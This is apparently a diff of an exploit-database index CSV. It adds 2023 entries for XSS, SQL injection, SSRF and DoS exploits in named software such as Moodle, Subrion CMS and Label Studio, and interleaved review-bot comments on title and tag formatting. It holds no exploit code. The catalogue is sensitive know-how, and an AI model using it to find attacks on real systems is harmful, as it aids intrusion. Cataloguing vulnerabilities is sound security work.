27618,exploits/php/webapps/27618.txt,"JetPhoto 1.0/2.0/2.1 - 'Slideshow.php?name' Cross-Site Scripting",2006-04-11,0o_zeus_o0,webapps,php,,2006-04-11,2013-08-16,1,CVE-2006-1760;OSVDB-24493,,,,,https://www.securityfocus.com/bid/17449/info 27618,exploits/php/webapps/27618.txt,"JetPhoto 1.0/2.0/2.1 - 'Slideshow.php?name' Cross-Site Scripting",2006-04-11,0o_zeus_o0,webapps,php,,2006-04-11,2013-08-16,1,CVE-2006-1760;OSVDB-24493,,,,,https://www.securityfocus.com/bid/17449/info
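Review bot: the new 51104 row titles the issue "Cross Site Scripting (XSS)" without the hyphen, while the surrounding rows (27617, 27618, 27619) and the rest of the index use "Cross-Site Scripting"; aligning the title to "Jetpack 11.4 - Cross-Site Scripting (XSS)" keeps title-based searches consistent. The codes column is also empty here, so if a CVE was assigned for this Jetpack finding it should be filled in as the neighbouring rows do.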
@ -23275,6 +23286,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
24279,exploits/php/webapps/24279.txt,"Moodle Help Script 1.x - Cross-Site Scripting",2004-07-13,morpheus[bd],webapps,php,,2004-07-13,2013-01-21,1,CVE-2004-0725;OSVDB-7865,,,,,https://www.securityfocus.com/bid/10718/info 24279,exploits/php/webapps/24279.txt,"Moodle Help Script 1.x - Cross-Site Scripting",2004-07-13,morpheus[bd],webapps,php,,2004-07-13,2013-01-21,1,CVE-2004-0725;OSVDB-7865,,,,,https://www.securityfocus.com/bid/10718/info
46881,exploits/php/webapps/46881.txt,"Moodle Jmol Filter 6.1 - Directory Traversal / Cross-Site Scripting",2019-05-21,"Dionach Ltd",webapps,php,,2019-05-21,2019-05-21,0,,"Cross-Site Scripting (XSS)",,,, 46881,exploits/php/webapps/46881.txt,"Moodle Jmol Filter 6.1 - Directory Traversal / Cross-Site Scripting",2019-05-21,"Dionach Ltd",webapps,php,,2019-05-21,2019-05-21,0,,"Cross-Site Scripting (XSS)",,,,
46881,exploits/php/webapps/46881.txt,"Moodle Jmol Filter 6.1 - Directory Traversal / Cross-Site Scripting",2019-05-21,"Dionach Ltd",webapps,php,,2019-05-21,2019-05-21,0,,Traversal,,,, 46881,exploits/php/webapps/46881.txt,"Moodle Jmol Filter 6.1 - Directory Traversal / Cross-Site Scripting",2019-05-21,"Dionach Ltd",webapps,php,,2019-05-21,2019-05-21,0,,Traversal,,,,
51115,exploits/php/webapps/51115.txt,"Moodle LMS 4.0 - Cross-Site Scripting (XSS)",2023-03-28,"Saud Alenazi",webapps,php,,2023-03-28,2023-03-28,0,,,,,,
4951,exploits/php/webapps/4951.txt,"Mooseguy Blog System 1.0 - 'month' SQL Injection",2008-01-21,The_HuliGun,webapps,php,,2008-01-20,2016-11-14,1,OSVDB-40959;CVE-2008-0424,,,,http://www.exploit-db.commgbs_1.0.zip, 4951,exploits/php/webapps/4951.txt,"Mooseguy Blog System 1.0 - 'month' SQL Injection",2008-01-21,The_HuliGun,webapps,php,,2008-01-20,2016-11-14,1,OSVDB-40959;CVE-2008-0424,,,,http://www.exploit-db.commgbs_1.0.zip,
27871,exploits/php/webapps/27871.txt,"mooSocial 1.3 - Multiple Vulnerabilities",2013-08-26,Esac,webapps,php,,2013-08-26,2013-08-26,0,OSVDB-96633;OSVDB-96632;OSVDB-96631;OSVDB-96630;OSVDB-96629;OSVDB-96628;OSVDB-96627;OSVDB-96626;OSVDB-96625;OSVDB-96624,,,,, 27871,exploits/php/webapps/27871.txt,"mooSocial 1.3 - Multiple Vulnerabilities",2013-08-26,Esac,webapps,php,,2013-08-26,2013-08-26,0,OSVDB-96633;OSVDB-96632;OSVDB-96631;OSVDB-96630;OSVDB-96629;OSVDB-96628;OSVDB-96627;OSVDB-96626;OSVDB-96625;OSVDB-96624,,,,,
45330,exploits/php/webapps/45330.txt,"mooSocial Store Plugin 2.6 - SQL Injection",2018-09-04,"Andrea Bocchetti",webapps,php,,2018-09-04,2018-09-06,0,,"SQL Injection (SQLi)",,,, 45330,exploits/php/webapps/45330.txt,"mooSocial Store Plugin 2.6 - SQL Injection",2018-09-04,"Andrea Bocchetti",webapps,php,,2018-09-04,2018-09-06,0,,"SQL Injection (SQLi)",,,,
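Review bot: the tags column is left empty on the new 51115 row even though the adjacent Moodle row 46881 carries the "Cross-Site Scripting (XSS)" tag for the same class of issue; populating the tag keeps the category filter usable for this entry. Unrelated to this change but visible in the context, the two 46881 rows differ only in their tag value ("Cross-Site Scripting (XSS)" vs "Traversal"), which is worth confirming is the intended encoding for multi-tag entries rather than a duplicated id.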
@ -24501,6 +24513,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
48631,exploits/php/webapps/48631.txt,"Online Shopping Portal 3.1 - Authentication Bypass",2020-07-01,"Ümit Yalçın",webapps,php,,2020-07-01,2020-07-01,0,,,,,, 48631,exploits/php/webapps/48631.txt,"Online Shopping Portal 3.1 - Authentication Bypass",2020-07-01,"Ümit Yalçın",webapps,php,,2020-07-01,2020-07-01,0,,,,,,
50029,exploits/php/webapps/50029.py,"Online Shopping Portal 3.1 - Remote Code Execution (Unauthenticated)",2021-06-17,Tagoletta,webapps,php,,2021-06-17,2021-06-17,0,,,,,, 50029,exploits/php/webapps/50029.py,"Online Shopping Portal 3.1 - Remote Code Execution (Unauthenticated)",2021-06-17,Tagoletta,webapps,php,,2021-06-17,2021-06-17,0,,,,,,
48383,exploits/php/webapps/48383.txt,"Online shopping system advanced 1.0 - 'p' SQL Injection",2020-04-27,"Majid kalantari",webapps,php,,2020-04-27,2020-04-27,0,,,,,, 48383,exploits/php/webapps/48383.txt,"Online shopping system advanced 1.0 - 'p' SQL Injection",2020-04-27,"Majid kalantari",webapps,php,,2020-04-27,2020-04-27,0,,,,,,
51103,exploits/php/webapps/51103.txt,"Online shopping system advanced 1.0 - Multiple Vulnerabilities",2023-03-28,"Rafael Pedrero",webapps,php,,2023-03-28,2023-03-28,0,,,,,,
35480,exploits/php/webapps/35480.txt,"Online store PHP script - Multiple Cross-Site Scripting / SQL Injections",2011-03-21,"kurdish hackers team",webapps,php,,2011-03-21,2014-12-07,1,,,,,,https://www.securityfocus.com/bid/46960/info 35480,exploits/php/webapps/35480.txt,"Online store PHP script - Multiple Cross-Site Scripting / SQL Injections",2011-03-21,"kurdish hackers team",webapps,php,,2011-03-21,2014-12-07,1,,,,,,https://www.securityfocus.com/bid/46960/info
44719,exploits/php/webapps/44719.txt,"Online Store System CMS 1.0 - SQL Injection",2018-05-23,AkkuS,webapps,php,,2018-05-23,2018-05-23,0,,,,,, 44719,exploits/php/webapps/44719.txt,"Online Store System CMS 1.0 - SQL Injection",2018-05-23,AkkuS,webapps,php,,2018-05-23,2018-05-23,0,,,,,,
48616,exploits/php/webapps/48616.txt,"Online Student Enrollment System 1.0 - Cross-Site Request Forgery (Add Student)",2020-06-23,BKpatron,webapps,php,,2020-06-23,2020-06-23,0,,,,,, 48616,exploits/php/webapps/48616.txt,"Online Student Enrollment System 1.0 - Cross-Site Request Forgery (Add Student)",2020-06-23,BKpatron,webapps,php,,2020-06-23,2020-06-23,0,,,,,,
@ -28482,6 +28495,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
49245,exploits/php/webapps/49245.txt,"Rukovoditel 2.6.1 - Cross-Site Request Forgery (Change password)",2020-12-14,KeopssGroup0day_Inc,webapps,php,,2020-12-14,2020-12-14,0,,,,,, 49245,exploits/php/webapps/49245.txt,"Rukovoditel 2.6.1 - Cross-Site Request Forgery (Change password)",2020-12-14,KeopssGroup0day_Inc,webapps,php,,2020-12-14,2020-12-14,0,,,,,,
49238,exploits/php/webapps/49238.sh,"Rukovoditel 2.6.1 - RCE (1)",2020-12-11,coiffeur,webapps,php,,2020-12-11,2021-02-18,0,CVE-2020-11819,,,,, 49238,exploits/php/webapps/49238.sh,"Rukovoditel 2.6.1 - RCE (1)",2020-12-11,coiffeur,webapps,php,,2020-12-11,2021-02-18,0,CVE-2020-11819,,,,,
48784,exploits/php/webapps/48784.py,"Rukovoditel 2.7.1 - Remote Code Execution (2) (Authenticated)",2020-09-02,danyx07,webapps,php,,2020-09-02,2021-02-18,0,CVE-2020-11819,,,,, 48784,exploits/php/webapps/48784.py,"Rukovoditel 2.7.1 - Remote Code Execution (2) (Authenticated)",2020-09-02,danyx07,webapps,php,,2020-09-02,2021-02-18,0,CVE-2020-11819,,,,,
51121,exploits/php/webapps/51121.txt,"rukovoditel 3.2.1 - Cross-Site Scripting (XSS)",2023-03-28,nu11secur1ty,webapps,php,,2023-03-28,2023-03-28,0,,,,,,
46608,exploits/php/webapps/46608.txt,"Rukovoditel ERP & CRM 2.4.1 - 'path' Cross-Site Scripting",2019-03-26,"Javier Olmedo",webapps,php,80,2019-03-26,2019-03-26,0,CVE-2019-7400,"Cross-Site Scripting (XSS)",,,http://www.exploit-db.comrukovoditel_2.4.zip,https://hackpuntes.com/cve-2019-7400-rukovoditel-erp-crm-2-4-1-cross-site-scripting-reflejado/ 46608,exploits/php/webapps/46608.txt,"Rukovoditel ERP & CRM 2.4.1 - 'path' Cross-Site Scripting",2019-03-26,"Javier Olmedo",webapps,php,80,2019-03-26,2019-03-26,0,CVE-2019-7400,"Cross-Site Scripting (XSS)",,,http://www.exploit-db.comrukovoditel_2.4.zip,https://hackpuntes.com/cve-2019-7400-rukovoditel-erp-crm-2-4-1-cross-site-scripting-reflejado/
45620,exploits/php/webapps/45620.txt,"Rukovoditel Project Management CRM 2.3 - 'path' SQL Injection",2018-10-16,"Ihsan Sencan",webapps,php,80,2018-10-16,2018-10-18,0,,"SQL Injection (SQLi)",,,http://www.exploit-db.comrukovoditel_2.3.zip, 45620,exploits/php/webapps/45620.txt,"Rukovoditel Project Management CRM 2.3 - 'path' SQL Injection",2018-10-16,"Ihsan Sencan",webapps,php,80,2018-10-16,2018-10-18,0,,"SQL Injection (SQLi)",,,http://www.exploit-db.comrukovoditel_2.3.zip,
46011,exploits/php/webapps/46011.rb,"Rukovoditel Project Management CRM 2.3.1 - Remote Code Execution (Metasploit)",2018-12-19,AkkuS,webapps,php,,2018-12-19,2019-03-06,0,CVE-2018-20166,"Metasploit Framework (MSF)",,,http://www.exploit-db.comrukovoditel_2.3.1.zip, 46011,exploits/php/webapps/46011.rb,"Rukovoditel Project Management CRM 2.3.1 - Remote Code Execution (Metasploit)",2018-12-19,AkkuS,webapps,php,,2018-12-19,2019-03-06,0,CVE-2018-20166,"Metasploit Framework (MSF)",,,http://www.exploit-db.comrukovoditel_2.3.1.zip,
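Review bot: the new 51121 row spells the product "rukovoditel" in lowercase while every neighbouring row (49245, 49238, 48784, 46608, 45620, 46011) uses "Rukovoditel"; since the index is ordered by description, the lowercase form also changes where the entry sorts, so the title should read "Rukovoditel 3.2.1 - Cross-Site Scripting (XSS)". The tags column is empty where rows 46608 and 45620 use "Cross-Site Scripting (XSS)" and "SQL Injection (SQLi)" respectively, so the XSS tag should be added for consistency.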
@ -28814,6 +28828,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
35701,exploits/php/webapps/35701.txt,"SelectaPix 1.4.1 - 'uploadername' Cross-Site Scripting",2011-05-03,"High-Tech Bridge SA",webapps,php,,2011-05-03,2015-01-05,1,,,,,,https://www.securityfocus.com/bid/47701/info 35701,exploits/php/webapps/35701.txt,"SelectaPix 1.4.1 - 'uploadername' Cross-Site Scripting",2011-05-03,"High-Tech Bridge SA",webapps,php,,2011-05-03,2015-01-05,1,,,,,,https://www.securityfocus.com/bid/47701/info
34146,exploits/php/webapps/34146.txt,"Sell@Site PHP Online Jobs Login - Multiple SQL Injections",2010-06-15,"L0rd CrusAd3r",webapps,php,,2010-06-15,2014-07-23,1,,,,,, 34146,exploits/php/webapps/34146.txt,"Sell@Site PHP Online Jobs Login - Multiple SQL Injections",2010-06-15,"L0rd CrusAd3r",webapps,php,,2010-06-15,2014-07-23,1,,,,,,
48467,exploits/php/webapps/48467.txt,"Sellacious eCommerce 4.6 - Persistent Cross-Site Scripting",2020-05-13,Vulnerability-Lab,webapps,php,,2020-05-13,2020-05-13,0,,,,,, 48467,exploits/php/webapps/48467.txt,"Sellacious eCommerce 4.6 - Persistent Cross-Site Scripting",2020-05-13,Vulnerability-Lab,webapps,php,,2020-05-13,2020-05-13,0,,,,,,
51120,exploits/php/webapps/51120.txt,"Senayan Library Management System v9.5.0 - SQL Injection",2023-03-28,nu11secur1ty,webapps,php,,2023-03-28,2023-03-28,0,,,,,,
2117,exploits/php/webapps/2117.php,"SendCard 3.4.0 - Unauthorized Administrative Access",2006-08-03,rgod,webapps,php,,2006-08-02,2016-08-31,1,OSVDB-27782,,,,http://www.exploit-db.comsendcard_3-4-0.tar.gz, 2117,exploits/php/webapps/2117.php,"SendCard 3.4.0 - Unauthorized Administrative Access",2006-08-03,rgod,webapps,php,,2006-08-02,2016-08-31,1,OSVDB-27782,,,,http://www.exploit-db.comsendcard_3-4-0.tar.gz,
3827,exploits/php/webapps/3827.txt,"Sendcard 3.4.1 - 'sendcard.php?form' Local File Inclusion",2007-05-01,ettee,webapps,php,,2007-04-30,2016-09-30,1,OSVDB-35738;CVE-2007-2471,,,,http://www.exploit-db.comsendcard_3-4-1.tar.gz, 3827,exploits/php/webapps/3827.txt,"Sendcard 3.4.1 - 'sendcard.php?form' Local File Inclusion",2007-05-01,ettee,webapps,php,,2007-04-30,2016-09-30,1,OSVDB-35738;CVE-2007-2471,,,,http://www.exploit-db.comsendcard_3-4-1.tar.gz,
4029,exploits/php/webapps/4029.php,"Sendcard 3.4.1 - Local File Inclusion / Remote Code Execution",2007-06-04,Silentz,webapps,php,,2007-06-03,,1,OSVDB-35741;CVE-2007-3082,,,,, 4029,exploits/php/webapps/4029.php,"Sendcard 3.4.1 - Local File Inclusion / Remote Code Execution",2007-06-04,Silentz,webapps,php,,2007-06-03,,1,OSVDB-35741;CVE-2007-3082,,,,,
@ -29443,6 +29458,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
23382,exploits/php/webapps/23382.txt,"Social Sites MyBB Plugin 0.2.2 - Cross-Site Scripting",2012-12-14,s3m00t,webapps,php,,2012-12-14,2012-12-14,1,OSVDB-88458,,,,http://www.exploit-db.comsocialsites.zip, 23382,exploits/php/webapps/23382.txt,"Social Sites MyBB Plugin 0.2.2 - Cross-Site Scripting",2012-12-14,s3m00t,webapps,php,,2012-12-14,2012-12-14,1,OSVDB-88458,,,,http://www.exploit-db.comsocialsites.zip,
33658,exploits/php/webapps/33658.txt,"Social Web CMS 2 - 'index.php' Cross-Site Scripting",2010-02-19,GoLdeN-z3r0,webapps,php,,2010-02-19,2014-06-07,1,,,,,,https://www.securityfocus.com/bid/38329/info 33658,exploits/php/webapps/33658.txt,"Social Web CMS 2 - 'index.php' Cross-Site Scripting",2010-02-19,GoLdeN-z3r0,webapps,php,,2010-02-19,2014-06-07,1,,,,,,https://www.securityfocus.com/bid/38329/info
10583,exploits/php/webapps/10583.txt,"social Web CMS Beta 2 - Multiple Vulnerabilities",2009-12-21,cp77fk4r,webapps,php,,2009-12-20,,1,OSVDB-61239;OSVDB-61238,,,,http://www.exploit-db.com1_SocialWebCMS_B2_RC1.zip, 10583,exploits/php/webapps/10583.txt,"social Web CMS Beta 2 - Multiple Vulnerabilities",2009-12-21,cp77fk4r,webapps,php,,2009-12-20,,1,OSVDB-61239;OSVDB-61238,,,,http://www.exploit-db.com1_SocialWebCMS_B2_RC1.zip,
51116,exploits/php/webapps/51116.txt,"Social-Share-Buttons v2.2.3 - SQL Injection",2023-03-28,nu11secur1ty,webapps,php,,2023-03-28,2023-03-28,0,,,,,,
34256,exploits/php/webapps/34256.py,"SocialABC NetworX 1.0.3 - Arbitrary File Upload / Cross-Site Scripting",2010-07-05,"John Leitch",webapps,php,,2010-07-05,2014-08-04,1,,,,,,https://www.securityfocus.com/bid/41396/info 34256,exploits/php/webapps/34256.py,"SocialABC NetworX 1.0.3 - Arbitrary File Upload / Cross-Site Scripting",2010-07-05,"John Leitch",webapps,php,,2010-07-05,2014-08-04,1,,,,,,https://www.securityfocus.com/bid/41396/info
18487,exploits/php/webapps/18487.html,"SocialCMS 1.0.2 - Cross-Site Request Forgery",2012-02-16,"Ivano Binetti",webapps,php,,2012-02-16,2012-02-16,0,OSVDB-71930;CVE-2012-1416,,,,http://www.exploit-db.comsocialcms1.0.2.zip, 18487,exploits/php/webapps/18487.html,"SocialCMS 1.0.2 - Cross-Site Request Forgery",2012-02-16,"Ivano Binetti",webapps,php,,2012-02-16,2012-02-16,0,OSVDB-71930;CVE-2012-1416,,,,http://www.exploit-db.comsocialcms1.0.2.zip,
17193,exploits/php/webapps/17193.html,"SocialCMS 1.0.2 - Multiple Cross-Site Request Forgery Vulnerabilities",2011-04-20,vir0e5,webapps,php,,2011-04-20,2011-04-20,0,OSVDB-71930;CVE-2012-1416,,,,http://www.exploit-db.comsocialcms1.0.2.zip, 17193,exploits/php/webapps/17193.html,"SocialCMS 1.0.2 - Multiple Cross-Site Request Forgery Vulnerabilities",2011-04-20,vir0e5,webapps,php,,2011-04-20,2011-04-20,0,OSVDB-71930;CVE-2012-1416,,,,http://www.exploit-db.comsocialcms1.0.2.zip,
@ -29816,6 +29832,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
49876,exploits/php/webapps/49876.py,"Subrion CMS 4.2.1 - Arbitrary File Upload",2021-05-17,"Fellipe Oliveira",webapps,php,,2021-05-17,2021-10-29,0,CVE-2018-19422,,,,, 49876,exploits/php/webapps/49876.py,"Subrion CMS 4.2.1 - Arbitrary File Upload",2021-05-17,"Fellipe Oliveira",webapps,php,,2021-05-17,2021-10-29,0,CVE-2018-19422,,,,,
50737,exploits/php/webapps/50737.txt,"Subrion CMS 4.2.1 - Cross Site Request Forgery (CSRF) (Add Amin)",2022-02-11,"Aryan Chehreghani",webapps,php,,2022-02-11,2022-02-11,0,,,,,, 50737,exploits/php/webapps/50737.txt,"Subrion CMS 4.2.1 - Cross Site Request Forgery (CSRF) (Add Amin)",2022-02-11,"Aryan Chehreghani",webapps,php,,2022-02-11,2022-02-11,0,,,,,,
45150,exploits/php/webapps/45150.txt,"Subrion CMS 4.2.1 - Cross-Site Scripting",2018-08-06,"Zeel Chavda",webapps,php,,2018-08-06,2018-08-08,0,CVE-2018-14840,"Cross-Site Scripting (XSS)",,,http://www.exploit-db.comsubrion_cms_4.2.1.zip, 45150,exploits/php/webapps/45150.txt,"Subrion CMS 4.2.1 - Cross-Site Scripting",2018-08-06,"Zeel Chavda",webapps,php,,2018-08-06,2018-08-08,0,CVE-2018-14840,"Cross-Site Scripting (XSS)",,,http://www.exploit-db.comsubrion_cms_4.2.1.zip,
51110,exploits/php/webapps/51110.txt,"Subrion CMS 4.2.1 - Stored Cross-Site Scripting (XSS)",2023-03-28,"Sinem Şahin",webapps,php,,2023-03-28,2023-03-28,0,,,,,,
26252,exploits/php/webapps/26252.txt,"Subscribe Me Pro 2.44 - S.pl Directory Traversal",2005-09-13,h4cky0u,webapps,php,,2005-09-13,2013-06-17,1,CVE-2005-2952;OSVDB-19380,,,,,https://www.securityfocus.com/bid/14817/info 26252,exploits/php/webapps/26252.txt,"Subscribe Me Pro 2.44 - S.pl Directory Traversal",2005-09-13,h4cky0u,webapps,php,,2005-09-13,2013-06-17,1,CVE-2005-2952;OSVDB-19380,,,,,https://www.securityfocus.com/bid/14817/info
22625,exploits/php/webapps/22625.txt,"SudBox Boutique 1.2 - 'login.php' Authentication Bypass",2003-05-21,frog,webapps,php,,2003-05-21,2012-11-11,1,,,,,,https://www.securityfocus.com/bid/7651/info 22625,exploits/php/webapps/22625.txt,"SudBox Boutique 1.2 - 'login.php' Authentication Bypass",2003-05-21,frog,webapps,php,,2003-05-21,2012-11-11,1,,,,,,https://www.securityfocus.com/bid/7651/info
10248,exploits/php/webapps/10248.txt,"Sugar CRM 5.5.0.rc2/5.2.0j - Multiple Vulnerabilities",2009-11-29,waraxe,webapps,php,,2009-11-28,,1,,,,,, 10248,exploits/php/webapps/10248.txt,"Sugar CRM 5.5.0.rc2/5.2.0j - Multiple Vulnerabilities",2009-11-29,waraxe,webapps,php,,2009-11-28,,1,,,,,,
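Review bot: the new 51110 row records a Stored XSS in Subrion CMS 4.2.1 with an empty codes column, while row 45150 already lists a Cross-Site Scripting issue for the same version under CVE-2018-14840; the submission should confirm this is a distinct injection point from 45150 and, if a CVE exists for it, reference it in the codes column, otherwise the two rows are hard to tell apart from the index alone. The "Cross-Site Scripting (XSS)" tag used by 45150 is also missing here.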
@ -33879,6 +33896,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
50374,exploits/php/webapps/50374.txt,"Young Entrepreneur E-Negosyo System 1.0 - SQL Injection Authentication Bypass",2021-10-04,"Jordan Glover",webapps,php,,2021-10-04,2021-10-04,0,,,,,, 50374,exploits/php/webapps/50374.txt,"Young Entrepreneur E-Negosyo System 1.0 - SQL Injection Authentication Bypass",2021-10-04,"Jordan Glover",webapps,php,,2021-10-04,2021-10-04,0,,,,,,
47294,exploits/php/webapps/47294.txt,"YouPHPTube 7.2 - 'userCreate.json.php' SQL Injection",2019-08-19,"Fabian Mosch",webapps,php,80,2019-08-19,2019-08-19,0,CVE-2019-14430,"SQL Injection (SQLi)",,,http://www.exploit-db.comYouPHPTube-7.2.tar.gz, 47294,exploits/php/webapps/47294.txt,"YouPHPTube 7.2 - 'userCreate.json.php' SQL Injection",2019-08-19,"Fabian Mosch",webapps,php,80,2019-08-19,2019-08-19,0,CVE-2019-14430,"SQL Injection (SQLi)",,,http://www.exploit-db.comYouPHPTube-7.2.tar.gz,
47326,exploits/php/webapps/47326.txt,"YouPHPTube 7.4 - Remote Code Execution",2019-08-30,"Damian Ebelties",webapps,php,80,2019-08-30,2019-08-30,0,,,,,http://www.exploit-db.comYouPHPTube-7.4.tar.gz, 47326,exploits/php/webapps/47326.txt,"YouPHPTube 7.4 - Remote Code Execution",2019-08-30,"Damian Ebelties",webapps,php,80,2019-08-30,2019-08-30,0,,,,,http://www.exploit-db.comYouPHPTube-7.4.tar.gz,
51101,exploits/php/webapps/51101.txt,"YouPHPTube<= 7.8 - Multiple Vulnerabilities",2023-03-28,"Rafael Pedrero",webapps,php,,2023-03-28,2023-03-28,0,,,,,,
33908,exploits/php/webapps/33908.txt,"Your Articles Directory - Login Option SQL Injection",2010-04-29,Sid3^effects,webapps,php,,2010-04-29,2014-06-28,1,,,,,,https://www.securityfocus.com/bid/39796/info 33908,exploits/php/webapps/33908.txt,"Your Articles Directory - Login Option SQL Injection",2010-04-29,Sid3^effects,webapps,php,,2010-04-29,2014-06-28,1,,,,,,https://www.securityfocus.com/bid/39796/info
38367,exploits/php/webapps/38367.txt,"Your Own Classifieds - Cross-Site Scripting",2013-03-08,"Rafay Baloch",webapps,php,,2013-03-08,2015-09-30,1,,,,,,https://www.securityfocus.com/bid/58399/info 38367,exploits/php/webapps/38367.txt,"Your Own Classifieds - Cross-Site Scripting",2013-03-08,"Rafay Baloch",webapps,php,,2013-03-08,2015-09-30,1,,,,,,https://www.securityfocus.com/bid/58399/info
12785,exploits/php/webapps/12785.pl,"YourArcadeScript 2.0b1 - Blind SQL Injection",2010-05-28,DNX,webapps,php,,2010-05-27,,0,,,,,, 12785,exploits/php/webapps/12785.pl,"YourArcadeScript 2.0b1 - Blind SQL Injection",2010-05-28,DNX,webapps,php,,2010-05-27,,0,,,,,,
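Review bot: the new 51101 row's title "YouPHPTube<= 7.8 - Multiple Vulnerabilities" has no space between the product name and the version constraint, unlike the rest of the index which separates product and version with a space (compare "YouPHPTube 7.2" and "YouPHPTube 7.4" directly above); "YouPHPTube <= 7.8 - Multiple Vulnerabilities" matches the convention and avoids breaking product-name searches.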
@ -34175,6 +34193,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
50393,exploits/python/webapps/50393.txt,"django-unicorn 0.35.3 - Stored Cross-Site Scripting (XSS)",2021-10-08,"Raven Security Associates",webapps,python,,2021-10-08,2021-10-08,0,CVE-2021-42053,,,,, 50393,exploits/python/webapps/50393.txt,"django-unicorn 0.35.3 - Stored Cross-Site Scripting (XSS)",2021-10-08,"Raven Security Associates",webapps,python,,2021-10-08,2021-10-08,0,CVE-2021-42053,,,,,
49495,exploits/python/webapps/49495.py,"Home Assistant Community Store (HACS) 1.10.0 - Directory Traversal",2021-01-29,Lyghtnox,webapps,python,,2021-01-29,2021-11-01,0,,,,,, 49495,exploits/python/webapps/49495.py,"Home Assistant Community Store (HACS) 1.10.0 - Directory Traversal",2021-01-29,Lyghtnox,webapps,python,,2021-01-29,2021-11-01,0,,,,,,
46386,exploits/python/webapps/46386.py,"Jinja2 2.10 - 'from_string' Server Side Template Injection",2019-02-15,JameelNabbo,webapps,python,,2019-02-15,2019-02-15,0,CVE-2019-8341,,,,http://www.exploit-db.comJinja2-2.10.tar.gz, 46386,exploits/python/webapps/46386.py,"Jinja2 2.10 - 'from_string' Server Side Template Injection",2019-02-15,JameelNabbo,webapps,python,,2019-02-15,2019-02-15,0,CVE-2019-8341,,,,http://www.exploit-db.comJinja2-2.10.tar.gz,
51109,exploits/python/webapps/51109.txt,"Label Studio 1.5.0 - Authenticated Server Side Request Forgery (SSRF)",2023-03-28,"Ryan Smith",webapps,python,,2023-03-28,2023-03-28,0,CVE-2022-36551,,,,,
40799,exploits/python/webapps/40799.txt,"Mezzanine 4.2.0 - Cross-Site Scripting",2016-11-21,"Curesec Research Team",webapps,python,80,2016-11-21,2016-11-21,0,,,,,http://www.exploit-db.commezzanine-4.2.0.tar.gz, 40799,exploits/python/webapps/40799.txt,"Mezzanine 4.2.0 - Cross-Site Scripting",2016-11-21,"Curesec Research Team",webapps,python,80,2016-11-21,2016-11-21,0,,,,,http://www.exploit-db.commezzanine-4.2.0.tar.gz,
49803,exploits/python/webapps/49803.py,"OpenPLC 3 - Remote Code Execution (Authenticated)",2021-04-26,"Fellipe Oliveira",webapps,python,,2021-04-26,2021-11-17,0,,,,,, 49803,exploits/python/webapps/49803.py,"OpenPLC 3 - Remote Code Execution (Authenticated)",2021-04-26,"Fellipe Oliveira",webapps,python,,2021-04-26,2021-11-17,0,,,,,,
50101,exploits/python/webapps/50101.py,"Pallets Werkzeug 0.15.4 - Path Traversal",2021-07-06,faisalfs10x,webapps,python,,2021-07-06,2021-07-06,0,CVE-2019-14322,,,,http://www.exploit-db.comwerkzeug-0.15.4.zip, 50101,exploits/python/webapps/50101.py,"Pallets Werkzeug 0.15.4 - Path Traversal",2021-07-06,faisalfs10x,webapps,python,,2021-07-06,2021-07-06,0,CVE-2019-14322,,,,http://www.exploit-db.comwerkzeug-0.15.4.zip,
@ -38120,6 +38139,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
14236,exploits/windows/dos/14236.txt,"Sun Java Web Server 7.0 u7 - Admin Interface Denial of Service",2010-07-06,muts,dos,windows,8800,2010-07-06,2010-07-06,1,,,,http://www.exploit-db.com/screenshots/idlt14500/14236.png,, 14236,exploits/windows/dos/14236.txt,"Sun Java Web Server 7.0 u7 - Admin Interface Denial of Service",2010-07-06,muts,dos,windows,8800,2010-07-06,2010-07-06,1,,,,http://www.exploit-db.com/screenshots/idlt14500/14236.png,,
4168,exploits/windows/dos/4168.vbs,"Sun Java WebStart - JNLP Stack Buffer Overflow (PoC)",2007-07-10,ZhenHan.Liu,dos,windows,,2007-07-09,2016-10-05,1,CVE-2007-3655,,,,, 4168,exploits/windows/dos/4168.vbs,"Sun Java WebStart - JNLP Stack Buffer Overflow (PoC)",2007-07-10,ZhenHan.Liu,dos,windows,,2007-07-09,2016-10-05,1,CVE-2007-3655,,,,,
17885,exploits/windows/dos/17885.txt,"sunway ForceControl 6.1 sp3 - Multiple Vulnerabilities",2011-09-23,"Luigi Auriemma",dos,windows,,2011-09-23,2011-09-23,1,OSVDB-75800;OSVDB-75799;OSVDB-75798;OSVDB-75796;OSVDB-75795;OSVDB-75684,,,,, 17885,exploits/windows/dos/17885.txt,"sunway ForceControl 6.1 sp3 - Multiple Vulnerabilities",2011-09-23,"Luigi Auriemma",dos,windows,,2011-09-23,2011-09-23,1,OSVDB-75800;OSVDB-75799;OSVDB-75798;OSVDB-75796;OSVDB-75795;OSVDB-75684,,,,,
51102,exploits/windows/dos/51102.txt,"SuperMailer v11.20 - Buffer overflow DoS",2023-03-28,"Rafael Pedrero",dos,windows,,2023-03-28,2023-03-28,0,,,,,,
38758,exploits/windows/dos/38758.py,"SuperScan 4.1 - Scan Hostname/IP Field Buffer Overflow",2015-11-19,"Luis Martínez",dos,windows,,2015-11-19,2015-11-19,0,,,,,, 38758,exploits/windows/dos/38758.py,"SuperScan 4.1 - Scan Hostname/IP Field Buffer Overflow",2015-11-19,"Luis Martínez",dos,windows,,2015-11-19,2015-11-19,0,,,,,,
38759,exploits/windows/dos/38759.py,"SuperScan 4.1 - Tools Hostname/IP/URL Field Buffer Overflow",2015-11-19,"Luis Martínez",dos,windows,,2015-11-19,2015-11-19,0,,,,,, 38759,exploits/windows/dos/38759.py,"SuperScan 4.1 - Tools Hostname/IP/URL Field Buffer Overflow",2015-11-19,"Luis Martínez",dos,windows,,2015-11-19,2015-11-19,0,,,,,,
38760,exploits/windows/dos/38760.py,"SuperScan 4.1 - Windows Enumeration Hostname/IP/URL Field Overflow (SEH)",2015-11-19,"Luis Martínez",dos,windows,,2015-11-19,2015-11-19,0,OSVDB-130627,,,,, 38760,exploits/windows/dos/38760.py,"SuperScan 4.1 - Windows Enumeration Hostname/IP/URL Field Overflow (SEH)",2015-11-19,"Luis Martínez",dos,windows,,2015-11-19,2015-11-19,0,OSVDB-130627,,,,,
